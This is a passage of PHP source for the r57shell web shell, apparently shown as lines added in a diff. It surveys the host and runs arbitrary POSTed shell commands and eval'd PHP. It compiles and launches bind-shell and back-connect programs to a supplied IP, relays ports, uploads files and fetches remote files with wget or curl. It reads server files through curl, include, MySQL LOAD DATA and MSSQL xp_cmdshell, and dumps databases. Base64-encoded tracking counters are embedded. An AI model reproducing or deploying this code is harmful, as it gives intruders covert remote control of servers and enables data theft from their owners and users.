+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
